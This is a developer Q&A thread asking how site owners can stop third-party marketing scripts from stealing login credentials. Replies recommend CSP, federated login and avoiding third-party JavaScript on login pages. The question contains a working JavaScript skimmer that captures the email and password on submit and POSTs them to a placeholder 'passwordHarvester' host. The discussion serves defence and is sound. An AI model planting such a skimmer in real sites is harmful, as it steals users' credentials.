# Login Form Password Security

Tags: javascript, websecurity

If the following JavaScript code was added into the stackoverflow.com login page then each time a browser clicked login, the form data entered would be sent off a third party website via a post request. I think this may be common on a lot of other websites as well. With the modern proliferation of "marketing tools" like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data? Can websites do anything to encrypt the password entered within the form box?

The only thing I can think of is requiring a thorough review of tracking code that the marketing department wants to implement. Can someone please help me understand if a more elegant solution exists?

```js
const elementToTrack = document.querySelector('#submit-button');
    elementToTrack.addEventListener('click', () => {
    getPW();
    });

function getPW() {

        var data = new FormData( document.getElementById('login-form') );
        data = data.entries();              
        var obj = data.next();
        var retrieved = {};             
        while(undefined !== obj.value) {    
            retrieved[obj.value[0]] = obj.value[1];
            obj = data.next();
        }
        
        let pw = retrieved.password;
        let email = retrieved.email;
        /*just using a placeholder url for illustrative purposes */
        fetch("https://somerandomserver.com/api/passwordHarvester", {
        method: "POST",
        body: JSON.stringify({
            email: email,
            password: pw
        }),
            headers: {
            "Content-type": "application/json; charset=UTF-8"
            }
    });
}
```

Comment: The only solution for a **safe** password website is not allow javascript on it, especially not 3rd party javascript, no libraries, no nothing.

Comment: @luk2302 Or you could use federated login like Azure AD/Auth0 etc. where the ability to inject anything in to the third party page is much more difficult.

Comment: JavaScript is fine, but it is 100% a good idea to put in a proper CSP that only allows the correct JavaScript to be loaded.

Comment: And the general consensus is: let's hope nobody is stealing our data in one of the 11 trillion javascript dependencies we have in our dependency tree that get bundled into our website and that literally nobody has any insight into. That is a bit over cynical but the general problem remains...

Comment: @luk2302 using any type of front end framework for logging in will always be inherently less secure than, as mention by Phuzi, a federation type login.
Its worth noting though that many of the popular open source projects have more than a few people keeping tabs on security and auditing them.

Answer (score 1):

> With the modern proliferation of "marketing tools" like Google Tag Manager, for example, how can website owners make sure small script snippets like the one below are not secretly harvesting customer data?

Only by not using them.

Load and execute JavaScript from a URL under someone else's control give them as much access to your page as any JS you write yourself has.

> Can websites do anything to encrypt the password entered within the form box?

No.

Browser built-in encryption only concerns itself with the HTTP requests and responses (i.e. HTTPS).

Anything you did with JavaScript would be subject to interference from or could be preempted by the third-party JS.

> The only thing I can think of is requiring a thorough review of tracking code that the marketing department wants to implement.

Since the JS his hosted by the third-party, there would be nothing stopping them changing it after the review (or serving different JS based on the source IP, user-agent, or whatever).

Comment: Your last point is why I always prefer to download and host my own CDN of production resources. Then they won't change. A good way to make sure you don't have rogue JavaScript is to keep tabs on the networking tab in your inspector.

Comment: Hmm, I think most organizations are going to want to use third party tools marketing to analyze visitors. I just don't think most organizations have the manpower or will to build out the analytics infrastructure.

Comment: @Dan then at least just don't have analytics on the login page and not on the page where you enter bank details.